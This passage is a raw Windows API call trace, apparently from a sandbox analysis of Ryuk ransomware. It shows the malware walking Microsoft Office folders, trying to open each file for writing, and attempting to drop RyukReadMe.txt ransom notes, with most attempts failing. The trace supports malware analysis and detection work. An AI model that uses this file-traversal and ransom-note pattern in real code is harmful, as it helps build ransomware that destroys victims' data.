dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.027] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.027] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.027] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0136.027] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0136.027] SetLastError (dwErrCode=0x0) [0136.027] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Bibliography\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\bibliography\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.027] GetLastError () returned 0x5 [0136.027] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0136.027] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.027] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.027] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.027] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BSTORM.VSL", dwFileAttributes=0x80) returned 0 [0136.028] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BSTORM.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\bstorm.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.028] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.028] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.028] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.028] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.029] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BW.CSS", dwFileAttributes=0x80) returned 0 [0136.029] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BW.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\bw.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.029] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.029] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.029] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.029] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.030] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CALEVENT.VRD", dwFileAttributes=0x80) returned 0 [0136.030] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CALEVENT.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\calevent.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.030] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.030] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.030] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.030] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.030] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.031] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.031] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.031] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\COFFEE.CSS", dwFileAttributes=0x80) returned 0 [0136.031] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\COFFEE.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\coffee.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.031] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.031] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.032] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.032] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.032] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CollectSignatures_Init.xsn", dwFileAttributes=0x80) returned 0 [0136.032] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CollectSignatures_Init.xsn" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\collectsignatures_init.xsn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.032] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.032] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.032] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.032] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.032] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CollectSignatures_Sign.xsn", dwFileAttributes=0x80) returned 0 [0136.033] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CollectSignatures_Sign.xsn" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\collectsignatures_sign.xsn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.033] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.033] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.033] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.033] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.033] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.033] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CT_ROOTS.XML", dwFileAttributes=0x80) returned 0 [0136.033] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CT_ROOTS.XML" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ct_roots.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.033] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.033] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.034] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.034] SetLastError (dwErrCode=0x0) [0136.034] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.034] GetLastError () returned 0x5 [0136.034] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0136.034] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.034] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DataServices\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0136.035] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.035] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.035] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.035] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DataServices\\+Connect to New Data Source.odc", dwFileAttributes=0x80) returned 0 [0136.036] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DataServices\\+Connect to New Data Source.odc" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dataservices\\+connect to new data source.odc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.036] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.036] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.036] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.036] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.036] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DataServices\\+NewSQLServerConnection.odc", dwFileAttributes=0x80) returned 0 [0136.036] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DataServices\\+NewSQLServerConnection.odc" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dataservices\\+newsqlserverconnection.odc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.036] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.036] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.036] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.036] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.036] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.037] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DataServices\\FOLDER.ICO", dwFileAttributes=0x80) returned 0 [0136.037] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DataServices\\FOLDER.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dataservices\\folder.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.037] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.037] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.037] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0136.037] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0136.038] SetLastError (dwErrCode=0x0) [0136.038] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DataServices\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dataservices\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.040] GetLastError () returned 0x5 [0136.040] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0136.040] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.040] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.040] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.041] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBENGR.VSL", dwFileAttributes=0x80) returned 0 [0136.041] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBENGR.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dbengr.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.041] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.041] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.042] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.042] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.042] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBSAMPLE.MDB", dwFileAttributes=0x80) returned 0 [0136.042] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBSAMPLE.MDB" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dbsample.mdb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.043] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.043] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.043] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.043] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.043] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBWIZ.VSL", dwFileAttributes=0x80) returned 0 [0136.043] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBWIZ.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dbwiz.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.043] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.043] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.043] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.043] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.044] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DEFAULT.CSS", dwFileAttributes=0x80) returned 0 [0136.044] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DEFAULT.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\default.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.044] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.044] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.044] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.044] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.044] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion.gta", dwFileAttributes=0x80) returned 0 [0136.045] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion.gta" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\discussion.gta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.045] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.045] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.045] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.045] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.045] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion14.gta", dwFileAttributes=0x80) returned 0 [0136.046] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion14.gta" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\discussion14.gta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.046] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.046] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.046] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.046] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.048] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.049] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DOORSCHD.VRD", dwFileAttributes=0x80) returned 0 [0136.049] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DOORSCHD.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\doorschd.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.049] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.049] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.050] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.050] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.050] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DRILLDWN.VSL", dwFileAttributes=0x80) returned 0 [0136.050] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DRILLDWN.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\drilldwn.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.051] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.051] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.051] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.051] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.051] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGCNV.VSL", dwFileAttributes=0x80) returned 0 [0136.051] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGCNV.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dwgcnv.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.052] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.052] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.052] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.052] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.052] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.052] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.052] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EADOCUMENTAPPROVAL_REVIEW.XSN", dwFileAttributes=0x80) returned 0 [0136.052] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EADOCUMENTAPPROVAL_REVIEW.XSN" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\eadocumentapproval_review.xsn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.052] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.052] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.052] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.052] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.052] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.052] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.052] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.052] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.053] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.053] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EQPLIST.VRD", dwFileAttributes=0x80) returned 0 [0136.053] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EQPLIST.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\eqplist.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.053] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.053] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.054] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.054] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.054] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV.HXS", dwFileAttributes=0x80) returned 0 [0136.054] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.054] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.055] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.055] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.055] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.055] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXC", dwFileAttributes=0x80) returned 0 [0136.055] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.056] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.056] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.056] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.056] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.056] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXT", dwFileAttributes=0x80) returned 0 [0136.056] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.056] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.056] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.056] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.056] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.056] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_F_COL.HXK", dwFileAttributes=0x80) returned 0 [0136.057] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev_f_col.hxk"), 